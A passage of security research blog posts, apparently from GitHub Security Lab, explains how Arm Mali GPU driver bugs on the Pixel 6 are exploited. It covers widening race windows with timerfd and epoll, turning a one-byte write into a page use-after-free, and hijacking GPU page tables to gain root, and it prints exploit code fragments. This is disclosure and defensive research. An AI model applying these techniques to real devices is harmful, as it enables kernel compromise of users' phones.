The refcounts of map->cpu_alloc and map->gpu_alloc are incremented in kbase_vmap_prot before entering this function. To prevent the backing store from being shrunk by kbase_mem_commit, kbase_vmap_phy_pages also calls kbase_mem_phy_alloc_kernel_mapped, which increments kernel_mappings in the gpu_alloc:

static inline void
kbase_mem_phy_alloc_kernel_mapped(struct kbase_mem_phy_alloc *alloc)
{
    atomic_inc(&alloc->kernel_mappings);
}

This prevents kbase_mem_commit from shrinking the backing store of the memory region while it is mapped by kbase_vmap_prot, as kbase_mem_commit will check the kernel_mappings of a memory region:

int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)
{
    ...
    if (atomic_read(&reg->cpu_alloc->kernel_mappings) > 0)
        goto out_unlock;
    ...
}

When kbase_mem_shrink is used outside of kbase_mem_commit, it is always used within the jctx.lock of the corresponding kbase_context. As mappings created by kbase_vmap_prot are only valid with this lock held, other uses of kbase_mem_shrink cannot free the backing pages while the mappings are in use either.

However, as we have seen, a KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region can have its backing store removed without going through kbase_mem_shrink. In fact, the KBASE_IOCTL_STICKY_RESOURCE_UNMAP ioctl can be used to trigger kbase_unmap_external_resource to remove its backing pages without holding the jctx.lock of the kbase_context. This means that many uses of kbase_vmap_prot are vulnerable to a race condition in which the vmap'ed pages can be removed while the mapping is in use, causing a use-after-free of the memory pages. For example, the KBASE_IOCTL_SOFT_EVENT_UPDATE ioctl calls kbasep_write_soft_event_status, which uses kbase_vmap_prot to create a mapping, and then unmaps it after the kernel finishes writing to it:

static int kbasep_write_soft_event_status(
        struct kbase_context *kctx, u64 evt, unsigned char new_status)
{
    ...
    mapped_evt = kbase_vmap_prot(kctx, evt, sizeof(*mapped_evt),
                     KBASE_REG_CPU_WR, &map);
    //Race window start
    if (!mapped_evt)                            
        return -EFAULT;
    *mapped_evt = new_status;
    //Race window end
    kbase_vunmap(kctx, &map);
    return 0;
}

If the memory region that evt belongs to is of type KBASE_MEM_TYPE_IMPORTED_USER_BUF, then between kbase_vmap_prot and kbase_vunmap, the memory region can have its backing pages removed by another thread using the KBASE_IOCTL_STICKY_RESOURCE_UNMAP ioctl. There are other uses of kbase_vmap_prot in the driver, but they follow a similar usage pattern and the use in KBASE_IOCTL_SOFT_EVENT_UPDATE has a simpler call graph, so I’ll stick to it in this research.

The problem? The race window is very, very tiny.

Winning a tight race and widening the race window

The race window in this case is very tight and consists of very few instructions, so even hitting it is hard enough, let alone trying to free and replace the backing pages inside this tiny window. In the past, I’ve used a technique from Jann Horn’s Exploiting race conditions on [ancient] Linux to widen race windows. While that technique can certainly be used to widen the race window here, it lacks the fine-grained control over timing that I need to hit the small race window. Fortunately, another technique also developed by Jann Horn, in Racing against the clock—hitting a tiny kernel race window, is just what I need.

The main idea of controlling race windows on the Linux kernel using these techniques is to interrupt a task inside the race window, causing it to pause. By controlling the timing of interrupts and the length of these pauses, the race window can be widened to allow other tasks to run within it. In the Linux kernel, there are different ways in which a task can be interrupted.

The technique in Exploiting race conditions on [ancient] Linux uses task priorities to manipulate interrupts. The idea is to pin a low priority task on a CPU, and then run another task with high priority on the same CPU during the race window. The Linux kernel scheduler will then interrupt the low priority task to allow the high priority task to run. While this can stop the low priority task for a long time, depending on how long it takes the high priority task to run, it is difficult to control the precise timing of the interrupt.

The Linux kernel also provides APIs that allow users to schedule an interrupt at a precise time in the future. This allows finer-grained control over the timing of the interrupts and was explored in Racing against the clock—hitting a tiny kernel race window. One such API is the timerfd: a file descriptor whose readiness can be scheduled using the hardware timer. Using the timerfd_settime syscall, I can create a timerfd and schedule it to become ready at a future time. If I have epoll instances monitoring the timerfd, then by the time the timerfd becomes ready, the epoll instances will be iterated through and woken up.


  migrate_to_cpu(0);   //<------- pin this task to a cpu

  int tfd = timerfd_create(CLOCK_MONOTONIC, 0);   //<----- creates timerfd
  //Adds epoll watchers
  int epfds[NR_EPFDS];
  for (int i=0; i<NR_EPFDS; i++)
    epfds[i] = epoll_create1(0);

  for (int i=0; i<NR_EPFDS; i++) {
    struct epoll_event ev = { .events = EPOLLIN };
    epoll_ctl(epfds[i], EPOLL_CTL_ADD, tfd, &ev);
  }  
  
  timerfd_settime(tfd, TFD_TIMER_ABSTIME, ...);  //<----- schedule tfd to be available at a later time

  ioctl(mali_fd, KBASE_IOCTL_SOFT_EVENT_UPDATE,...); //<---- tfd becomes available and interrupts this ioctl  

In the above, I created a timerfd, tfd, using timerfd_create, and then added epoll watchers to it using the epoll_ctl syscall. After this, I schedule tfd to become available at a precise time in the future, and then run the KBASE_IOCTL_SOFT_EVENT_UPDATE ioctl. If tfd becomes available while KBASE_IOCTL_SOFT_EVENT_UPDATE is running, the ioctl will be interrupted and the epoll watchers of tfd are processed instead. By creating a large list of epoll watchers and scheduling tfd so that it becomes available inside the race window of KBASE_IOCTL_SOFT_EVENT_UPDATE, I can widen the race window enough to free and replace the backing store of my KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region.

Having said that, the race window is still very difficult to hit and most attempts to trigger the bug will fail. This means that I need some way to tell whether the bug has triggered before I continue with the next step of the exploit. Recall that the race window lies between the calls to kbase_vmap_prot and kbase_vunmap:

static int kbasep_write_soft_event_status(
        struct kbase_context *kctx, u64 evt, unsigned char new_status)
{
    ...
    mapped_evt = kbase_vmap_prot(kctx, evt, sizeof(*mapped_evt),
                     KBASE_REG_CPU_WR, &map);
    //Race window start
    if (!mapped_evt)                            
        return -EFAULT;
    *mapped_evt = new_status;
    //Race window end
    kbase_vunmap(kctx, &map);
    return 0;
}

The call kbase_vmap_prot holds the kctx->reg_lock for almost the entire duration of the function:

void *kbase_vmap_prot(struct kbase_context *kctx, u64 gpu_addr, size_t size,
              unsigned long prot_request, struct kbase_vmap_struct *map)
{
    struct kbase_va_region *reg;
    void *addr = NULL;
    u64 offset_bytes;
    struct kbase_mem_phy_alloc *cpu_alloc;
    struct kbase_mem_phy_alloc *gpu_alloc;
    int err;
    kbase_gpu_vm_lock(kctx);         //reg_lock
    ...
out_unlock:
    kbase_gpu_vm_unlock(kctx);      //reg_lock
    return addr;
fail_vmap_phy_pages:
    kbase_gpu_vm_unlock(kctx);
    kbase_mem_phy_alloc_put(cpu_alloc);
    kbase_mem_phy_alloc_put(gpu_alloc);
    return NULL;
}

A common case of failure is when the interrupt happens during the kbase_vmap_prot function. In this case the kctx->reg_lock, which is a mutex, is held. To test whether the mutex is held when the interrupt happens, I can make an ioctl call from a different thread during the interrupt that requires the kctx->reg_lock.

There are many options, and I chose KBASE_IOCTL_MEM_FREE because it requires the kctx->reg_lock most of the time and can be made to return early if an invalid argument is supplied. If the kctx->reg_lock is held by KBASE_IOCTL_SOFT_EVENT_UPDATE (which calls kbase_vmap_prot) while the interrupt happens, then KBASE_IOCTL_MEM_FREE cannot proceed and will return after KBASE_IOCTL_SOFT_EVENT_UPDATE. Otherwise, the KBASE_IOCTL_MEM_FREE ioctl will return first. By comparing when these ioctl calls return, I can determine whether the interrupt happened inside the kctx->reg_lock. Moreover, if the interrupt happens inside kbase_vmap_prot, then the address evt that I supplied to kbasep_write_soft_event_status will not have been written to.

So, if both of the following are true, then I know the interrupt must have happened before the race window ended, but not inside the kbase_vmap_prot function:

  1. A KBASE_IOCTL_MEM_FREE call started in another thread during the interrupt returns before the KBASE_IOCTL_SOFT_EVENT_UPDATE, and
  2. The address evt has not been written to.

The above conditions, however, can still be true if the interrupt happens before kbase_vmap_prot. In this case, if I remove the backing pages from the KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region, the kbase_vmap_prot call will simply fail because the address evt, which belongs to the memory region, is no longer valid. This then results in KBASE_IOCTL_SOFT_EVENT_UPDATE returning an error.

This gives me an indicator of when the interrupt happened and whether I should proceed with the exploit or try triggering the bug again. To decide whether the race is won, I can then do the following during the interrupt:

  1. Check whether evt has been written to. If it has, the interrupt happened too late and the race was lost.
  2. If evt has not been written to, make a KBASE_IOCTL_MEM_FREE ioctl call from another thread. If that ioctl returns before the KBASE_IOCTL_SOFT_EVENT_UPDATE ioctl that is being interrupted, proceed to the next step; otherwise, the interrupt happened inside kbase_vmap_prot (too early) and the race was lost.
  3. Proceed to remove the backing pages of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region that evt belongs to. If the KBASE_IOCTL_SOFT_EVENT_UPDATE ioctl returns an error, the interrupt happened before the kbase_vmap_prot call and the race was lost. Otherwise, the race is likely won and I can proceed to the next stage of the exploit.

The following figure illustrates these conditions and their relations to the race window.

One byte to root them all

Once the race is won, I can proceed to free and then replace the backing pages of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region. Then, after the interrupt returns, KBASE_IOCTL_SOFT_EVENT_UPDATE will write new_status to the free’d (and now replaced) backing page of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region via the kernel address created by vmap.

I’d like to replace those pages with memory pages used by the kernel. The problem is that memory pages in the Linux kernel are allocated according to their zone and migrate type, and pages do not generally get allocated to a different zone or migrate type. In our case, the backing pages of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region come from a user space application and are generally allocated with the GFP_HIGHUSER or the GFP_HIGHUSER_MOVABLE flag. On Android, which lacks the ZONE_HIGHMEM zone, this translates into an allocation in ZONE_NORMAL with the MIGRATE_UNMOVABLE (for GFP_HIGHUSER) or MIGRATE_MOVABLE (for GFP_HIGHUSER_MOVABLE) migrate type. Memory pages used by the kernel, such as those used by the SLUB allocator for allocating kernel objects, on the other hand, are allocated in ZONE_NORMAL with the MIGRATE_UNMOVABLE migrate type. Most user space memory, such as memory allocated via the mmap syscall, is allocated with the GFP_HIGHUSER_MOVABLE flag, making it unsuitable for my purpose. In order to replace the backing pages with kernel memory pages, I therefore need to find a way to map pages to user space that are allocated with the GFP_HIGHUSER flag.

The situation is similar to what I had with “The code that wasn’t there: Reading memory on an Android device by accident.” In the section “Leaking Kernel memory,” I used the asynchronous I/O file system to allocate user space memory with the GFP_HIGHUSER flag. By first allocating user space memory with the asynchronous I/O file system and then importing that memory to the Mali driver to create a KBASE_MEM_TYPE_IMPORTED_USER_BUF region with that memory as backing pages, I can create a KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region with backing pages in ZONE_NORMAL and the MIGRATE_UNMOVABLE migrate type, which can be reused as kernel pages.

One big problem with bugs in kbase_vmap_prot is that, in all uses of kbase_vmap_prot, there is very little control of the write value. In the case of the KBASE_IOCTL_SOFT_EVENT_UPDATE, it is only possible to write either zero or one to the chosen address:

static int kbasep_write_soft_event_status(
        struct kbase_context *kctx, u64 evt, unsigned char new_status)
{
    ...
    if ((new_status != BASE_JD_SOFT_EVENT_SET) &&
        (new_status != BASE_JD_SOFT_EVENT_RESET))
        return -EINVAL;
    mapped_evt = kbase_vmap_prot(kctx, evt, sizeof(*mapped_evt),
                     KBASE_REG_CPU_WR, &map);
    ...
    *mapped_evt = new_status;
    kbase_vunmap(kctx, &map);
    return 0;
}

In the above, new_status, which is the value to be written to the address evt, is checked to ensure that it is either BASE_JD_SOFT_EVENT_SET, or BASE_JD_SOFT_EVENT_RESET, which are one or zero, respectively.

Even though the write primitive is rather restrictive, by replacing the backing page of my KBASE_MEM_TYPE_IMPORTED_USER_BUF region with page table global directories (PGD) used by the kernel, or with pages used by the SLUB allocator, I still have a fairly strong primitive.

However, since the bug is rather difficult to trigger, ideally, I’d like to be able to replace the backing page reliably and finish the exploit by triggering the bug once only. This makes replacing the pages with kernel PGD or SLUB allocator backing pages less than ideal here, so let’s have a look at another option.

While most kernel objects are allocated via variants of the kmalloc call, which uses the SLUB allocator, large objects are sometimes allocated using variants of the vmalloc call. Unlike kmalloc, vmalloc allocates memory at the granularity of pages and takes the pages directly from the kernel page allocator. While vmalloc is inefficient for small allocations, for objects larger than the size of a page it is often considered a more optimal choice. It is also considered more secure, as the allocated memory is used exclusively by the allocated object and a guard page is often inserted at the end of the memory. This means that any out-of-bounds access is likely to either hit unused memory or the guard page. In our case, however, replacing the backing page with a vmalloc object is just what I need.

To optimize allocation, the kernel page allocator maintains a per-CPU cache, which it uses to keep track of pages that were recently freed on each CPU. New allocations from the same CPU are simply given the most recently freed page on that CPU from the per-CPU cache. So by freeing the backing pages of a KBASE_MEM_TYPE_IMPORTED_USER_BUF region on a CPU and then immediately allocating an object via vmalloc, the newly allocated object will reuse the backing pages of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region. This allows me to write either zero or one to any offset in this object. A suitable object allocated by vzalloc (a variant of vmalloc that zeros out the allocated memory) is none other than the kbase_mem_phy_alloc itself. The object is created by kbase_alloc_create, which can be triggered via many ioctl calls such as KBASE_IOCTL_MEM_ALLOC:

static inline struct kbase_mem_phy_alloc *kbase_alloc_create(
        struct kbase_context *kctx, size_t nr_pages,
        enum kbase_memory_type type, int group_id)
{
    ...
    size_t alloc_size = sizeof(*alloc) + sizeof(*alloc->pages) * nr_pages;
    ...
    /* Allocate based on the size to reduce internal fragmentation of vmem */
    if (alloc_size > KBASE_MEM_PHY_ALLOC_LARGE_THRESHOLD)
        alloc = vzalloc(alloc_size);
    else
        alloc = kzalloc(alloc_size, GFP_KERNEL);
    ...
}

When creating a kbase_mem_phy_alloc object, the allocation size, alloc_size depends on the size of the region to be created. If alloc_size is larger than the KBASE_MEM_PHY_ALLOC_LARGE_THRESHOLD, then vzalloc is used for allocating the object. By making a KBASE_IOCTL_MEM_ALLOC ioctl call immediately after the KBASE_IOCTL_STICKY_RESOURCE_UNMAP ioctl call that frees the backing pages of a KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region, I can reliably replace the backing page with a kernel page that holds a kbase_mem_phy_alloc object:


ioctl(mali_fd, KBASE_IOCTL_STICKY_RESOURCE_UNMAP, ...);  //<------ frees backing page
ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, ...);              //<------ reclaim backing page as kbase_mem_phy_alloc

So, what should I rewrite in this object? There are many options, for example, rewriting the kref field can easily cause a refcounting problem and turn this into a UAF of a kbase_mem_phy_alloc, which is easy to exploit. It is, however, much simpler to just set the gpu_mappings field to zero:

struct kbase_mem_phy_alloc {
    struct kref           kref;
    atomic_t              gpu_mappings;
    atomic_t              kernel_mappings;
    size_t                nents;
    struct tagged_addr    *pages;
    ...
}

The Mali driver allows memory regions to share the same backing pages via the KBASE_IOCTL_MEM_ALIAS ioctl call. A memory region created by KBASE_IOCTL_MEM_ALLOC can be aliased by passing it as a parameter in the call to KBASE_IOCTL_MEM_ALIAS:


  union kbase_ioctl_mem_alloc alloc = ...;
  ...
  ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &alloc);
  void* region = mmap(NULL, ..., mali_fd, alloc.out.gpu_va);
  union kbase_ioctl_mem_alias alias = ...;
  ...
  struct base_mem_aliasing_info ai = ...;
  ai.handle.basep.handle = (uint64_t)region;
  ...
  alias.in.aliasing_info = (uint64_t)(&ai);
  ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &alias);
  void* alias_region = mmap(NULL, ..., mali_fd,  alias.out.gpu_va);

In the above, a memory region is created using KBASE_IOCTL_MEM_ALLOC and mapped to region. This region is then passed to the KBASE_IOCTL_MEM_ALIAS call, and after mapping the result to user space, both region and alias_region share the same backing pages. Because the backing pages are now shared, region must be prevented from being resized via the KBASE_IOCTL_MEM_COMMIT ioctl; otherwise, the backing pages may be freed while they are still mapped to alias_region:


  union kbase_ioctl_mem_alloc alloc = ...;
  ...
  ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &alloc);
  void* region = mmap(NULL, ..., mali_fd, alloc.out.gpu_va);
  union kbase_ioctl_mem_alias alias = ...;
  ...
  struct base_mem_aliasing_info ai = ...;
  ai.handle.basep.handle = (uint64_t)region;
  ...
  alias.in.aliasing_info = (uint64_t)(&ai);
  ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &alias);
  void* alias_region = mmap(NULL, ..., mali_fd,  alias.out.gpu_va);

  struct kbase_ioctl_mem_commit commit = ...;
  commit.gpu_addr = (uint64_t)region;
  ioctl(mali_fd, KBASE_IOCTL_MEM_COMMIT, &commit);  //<---- ioctl fails as region cannot be resized

This is achieved using the gpu_mappings field in the gpu_alloc of a kbase_va_region. The gpu_mappings field keeps track of the number of memory regions that are sharing the same backing pages. When a region is aliased, gpu_mappings is incremented:

u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
            u64 nents, struct base_mem_aliasing_info *ai,
            u64 *num_pages)
{
    ...
    for (i = 0; i < nents; i++) {
        if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) {
            ...
        } else {
            aliasing_reg = kbase_region_tracker_find_region_base_address(
                kctx,
                (ai[i].handle.basep.handle >> PAGE_SHIFT) << PAGE_SHIFT);
            ...
            alloc = aliasing_reg->gpu_alloc;
            ...
            kbase_mem_phy_alloc_gpu_mapped(alloc);  //gpu_mappings
        }
        ...
    }
    ...
}

The gpu_mappings field is checked in the KBASE_IOCTL_MEM_COMMIT call to ensure that the region is not mapped multiple times:

int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)
{
    ...
    if (atomic_read(&reg->gpu_alloc->gpu_mappings) > 1)
        goto out_unlock;
    ...
}

So, by overwriting gpu_mappings of a memory region to zero, I can cause an aliased memory region to pass the above check and have its backing store resized. This then causes its backing pages to be removed without removing the alias mappings. In particular, after shrinking the backing store, the alias region can be used to access backing pages that are already freed.

The situation is now very similar to what I had in “Corrupting memory without memory corruption” and I can apply the technique from the section, “Breaking out of the context,” to this bug.

To recap, I now have a kbase_va_region whose backing pages are already freed and I’d like to reuse these freed backing pages so I can gain read and write access to arbitrary memory. To understand how this can be done, we need to know how backing pages to a kbase_va_region are allocated.

When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:

int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
        struct tagged_addr *pages, bool partial_allowed)
{
    ...
    /* Get pages from this pool */
    while (nr_from_pool--) {
        p = kbase_mem_pool_remove_locked(pool);     //<------- 1.
        ...
    }

    if (i != nr_4k_pages && pool->next_pool) {
        /* Allocate via next pool */
        err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
                nr_4k_pages - i, pages + i, partial_allowed);
        ...
    } else {
        /* Get any remaining pages from kernel */
        while (i != nr_4k_pages) {
            p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
    }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages will be allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, the same happens in reverse: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context. If that memory pool is full, it'll try to return the remaining pages to pool->next_pool. If the next pool is also full, the remaining pages are returned to the kernel by freeing them via the buddy allocator.

As noted in “Corrupting memory without memory corruption,” pool->next_pool is a memory pool managed by the Mali driver and shared by all kbase_context objects. It is also used for allocating the page table global directories (PGDs) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in the section, “Breaking out of the context.”) As the bottom-level PGD stores the physical addresses of the pages backing GPU virtual memory addresses, being able to write to a PGD allows me to map arbitrary physical pages into GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory. As physical addresses for kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution.

The exploit for Pixel 6 can be found here with some setup notes.

Conclusions

In this post I’ve shown how root cause analysis of CVE-2022-36449 revealed the unusual memory management in KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region, which then led to the discovery of another vulnerability. This shows how important it is to carry out root cause analysis of existing vulnerabilities and to use the knowledge to identify new variants of an issue. While CVE-2022-46395 seems very difficult to exploit due to a very tight race window and the limited write primitive that can be achieved by the bug, I’ve demonstrated how techniques from Racing against the clock—hitting a tiny kernel race window can be used to exploit seemingly impossible race conditions, and how UAF in memory pages can be exploited reliably even with a very limited write primitive.

The post Rooting with root cause: finding a variant of a Project Zero bug appeared first on The GitHub Blog.

Pwning Pixel 6 with a leftover patch https://github.blog/security/vulnerability-research/pwning-pixel-6-with-a-leftover-patch/ Thu, 06 Apr 2023 16:00:48 +0000 https://github.blog/?p=71167 In this post, I’ll look at a security-related change in version r40p0 of the Arm Mali driver that was AWOL in the January update of the Pixel bulletin, where other patches from r40p0 were applied, and how these two lines of changes can be exploited to gain arbitrary kernel code execution and root from a malicious app. This highlights how treacherous it can be when backporting security changes.

The Christmas leftover patch

In the year 2023 A.D., after a long struggle, N-day vulnerabilities, such as CVE-2022-33917, CVE-2022-36449, and CVE-2022-38181 had been fixed in the Pixel 6. Vendor drivers like the Arm Mali had laid their patches at Android’s feet. Peace reigns, disturbed only by occasional toddlers bankrupting their parents with food ordering apps. All patches from upstream are applied.1

All? No, one patch still stubbornly holds out.

@@ -2262,10 +2258,13 @@ int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)

        if (atomic_read(&reg->cpu_alloc->kernel_mappings) > 0)
                goto out_unlock;
        if (reg->flags & KBASE_REG_DONT_NEED)
                goto out_unlock;

+       if (reg->flags & KBASE_REG_NO_USER_FREE)
+               goto out_unlock;

In this post, I’m going to take a very close look at what these two lines, or rather, the lack of them, are capable of.

GHSL-2023-005

GHSL-2023-005 can be used to gain arbitrary kernel code execution and root privileges from a malicious app on the Pixel 6. What makes this bug interesting from a patching point of view is that it was already fixed publicly in the Arm Mali GPU driver on October 7, 2022 in the r40p0 release. While other security patches from the r40 version of the driver had been backported to the Pixel 6 in the January security update, the particular change mentioned in the previous section was missing.

I noticed this change shortly after r40p0 was released and had always assumed that it was a defense-in-depth measure against potential issues similar to CVE-2022-38181. As it was part of the changes made in the r40 version of the driver, I assumed it’d be applied to Android when other security patches from the r40 driver were applied. To my surprise, when I checked the January patch for Google’s Pixel phones, I realized that while many security patches from r40p0 had been applied, this particular change was missing.

As it wasn’t clear to me whether this patch was going to be treated as a security issue and be applied at all, I reported it to the Android security team on January 10, 2023, together with a proof-of-concept exploit that roots the Pixel 6 phone to demonstrate the severity of the issue. I also sent a copy of the report to Arm in case it was an issue of cherry-picking patches. Arm replied on January 31, 2023 saying that there might have been a problem with backporting patches to version r36p0. The Android security team rated the issue as a high-severity vulnerability on January 13, 2023. However, on February 14, 2023, the Android security team decided that the issue was a duplicate of an internally reported issue.

The issue was eventually fixed silently in the March feature drop update (which was delayed until March 20, 2023 for the Pixel 6), where the source code progressed to the Android 13 qpr2 branch. Looking at this branch, the fix uses the kbase_va_region_is_no_user_free function, which was introduced in upstream drivers from version r41 onwards.

@@ -2270,8 +2237,11 @@

    if (atomic_read(&reg->cpu_alloc->kernel_mappings) > 0)
        goto out_unlock;
-   /* can't grow regions which are ephemeral */
-   if (reg->flags & KBASE_REG_DONT_NEED)
+
+   if (kbase_is_region_shrinkable(reg))
+       goto out_unlock;
+
+   if (kbase_va_region_is_no_user_free(kctx, reg))
        goto out_unlock;

So, it seems that this was indeed a backporting issue, as Arm suggested, and the problem has only been fixed in Pixel phones because the Android 13 qpr2 branch uses a newer version of the driver. It is perhaps a piece of luck that the feature drop update happened only two months after I reported the issue; otherwise, it may have taken longer to fix.

The Arm Mali GPU

The Arm Mali GPU can be integrated in various devices (for example, see “Implementations” in the Mali (GPU) Wikipedia entry) ranging from Android phones to smart TV boxes. It has been an attractive target on Android phones and has been targeted by in-the-wild exploits multiple times.

This issue is related to CVE-2022-38181, a vulnerability that I reported last year in the handling of another type of GPU memory, JIT memory, in the Arm Mali driver. Readers may find the section “The life cycle of JIT memory” in that post useful, although for completeness, I’ll also briefly explain JIT memory and the root cause of CVE-2022-38181 in this post.

JIT memory in Arm Mali

When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle.

In particular, the kbase_context manages different types of memory that are shared between the GPU devices and user space applications. JIT memory is one such type of memory whose lifetime is managed by the kernel driver. A user application can use the KBASE_IOCTL_JOB_SUBMIT ioctl call to instruct the GPU driver to create or free such memory regions. By submitting the BASE_JD_REQ_SOFT_JIT_ALLOC job, a user can allocate JIT memory, while the BASE_JD_REQ_SOFT_JIT_FREE job instructs the kernel to free the memory.

When users submit the BASE_JD_REQ_SOFT_JIT_FREE job to the GPU, the JIT memory region does not get freed immediately. Instead, the memory region is first shrunk to a minimal size via the function kbase_jit_free:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    //First reduce the size of the backing region and unmap the freed pages
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        u64 new_size = MAX(reg->initial_commit,
            div_u64(old_pages * (100 - kctx->trim_level), 100));
        u64 delta = old_pages - new_size;
        //Free delta pages in the region and reduces its size to old_pages - delta
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);
            mutex_unlock(&kctx->reg_lock);
        }
    }
    ...

In the above, the kbase_va_region reg is a struct representing the JIT memory region, and kbase_mem_shrink is a function that shrinks the region while freeing some of its backing pages. As explained in my previous post, the kbase_jit_free function also moves the JIT region to the evict_list of the kbase_context.

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    mutex_lock(&kctx->jit_evict_lock);
    /* This allocation can't already be on a list. */
    WARN_ON(!list_empty(&reg->gpu_alloc->evict_node));
    //Add reg to evict_list
    list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list);
    atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents);
    //Move reg to jit_pool_head
    list_move(&reg->jit_node, &kctx->jit_pool_head);
    ...
}

Memory regions in the evict_list will eventually be freed when memory pressure arises and the Linux kernel’s shrinker is triggered to reclaim unused memory. kbase_jit_free also performs other clean up actions that remove references to the JIT memory region so that it can no longer be reached from user space.

While the BASE_JD_REQ_SOFT_JIT_FREE GPU job can be used to put JIT memory in the evict_list so that it can be freed when the shrinker is triggered, the Arm Mali GPU driver also provides other ways to place a memory region in the evict_list. The KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl can be used to call the kbase_mem_flags_change function with the BASE_MEM_DONT_NEED flag to place a memory region in the evict_list:

int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask)
{
    ...
    prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
    new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;
    if (prev_needed != new_needed) {
        ...
        if (new_needed) {
            ...
            ret = kbase_mem_evictable_make(reg->gpu_alloc);  //<------ Add to `evict_list`
            if (ret)
                goto out_unlock;
        } else {
            kbase_mem_evictable_unmake(reg->gpu_alloc);     //<------- Remove from `evict_list`
        }
    }

Prior to version r40p0 of the driver, this ioctl could be used to add a JIT region directly to the evict_list, bypassing the clean up actions done by kbase_jit_free. This then caused a use-after-free vulnerability, CVE-2022-38181, which was fixed in r40p0 by preventing such flag changes from being applied to JIT region:

@@ -951,6 +951,15 @@
    if (kbase_is_region_invalid_or_free(reg))
        goto out_unlock;

+   /* There is no use case to support MEM_FLAGS_CHANGE ioctl for allocations
+    * that have NO_USER_FREE flag set, to mark them as evictable/reclaimable.
+    * This would usually include JIT allocations, Tiler heap related allocations
+    * & GPU queue ringbuffer and none of them needs to be explicitly marked
+    * as evictable by Userspace.
+    */
+   if (reg->flags & KBASE_REG_NO_USER_FREE)
+       goto out_unlock;
+
    /* Is the region being transitioning between not needed and needed? */
    prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
    new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;

In the above, code is added to prevent kbase_va_region with the KBASE_REG_NO_USER_FREE flag from being added to the evict_list via the kbase_mem_flags_change function. The KBASE_REG_NO_USER_FREE flag is added to the JIT region when it is created and is only removed while the region is being released. So, adding this condition very much prevents a JIT memory region from being added to the evict_list outside of kbase_jit_free.

For memory regions, however, lifetime management is not just about the kbase_va_region itself: the backing pages of a kbase_va_region may also be released by using the KBASE_IOCTL_MEM_COMMIT ioctl. This ioctl allows the user to change the number of backing pages in a region and may also be used with a JIT region to release its backing pages. So, naturally, the same condition should also be applied to the kbase_mem_commit function to avoid JIT regions being manipulated outside of the BASE_JD_REQ_SOFT_JIT_FREE job. This was indeed done by Arm to harden the handling of JIT memory:

@@ -2262,10 +2258,13 @@ int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)

        if (atomic_read(&reg->cpu_alloc->kernel_mappings) > 0)
                goto out_unlock;
        if (reg->flags & KBASE_REG_DONT_NEED)
                goto out_unlock;

+       if (reg->flags & KBASE_REG_NO_USER_FREE)
+               goto out_unlock;

This is the patch that we’re going to look at.

From defense-in-depth to offense-in-depth

While the changes made in the kbase_mem_commit function have removed the opportunity to manipulate the backing pages of a JIT region via the KBASE_IOCTL_MEM_COMMIT ioctl, the actual effect of the patch is more subtle, because even without the patch, the kbase_mem_commit function already prevents memory regions with the KBASE_REG_ACTIVE_JIT_ALLOC or KBASE_REG_DONT_NEED flags from being modified:

int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)
{
    ...
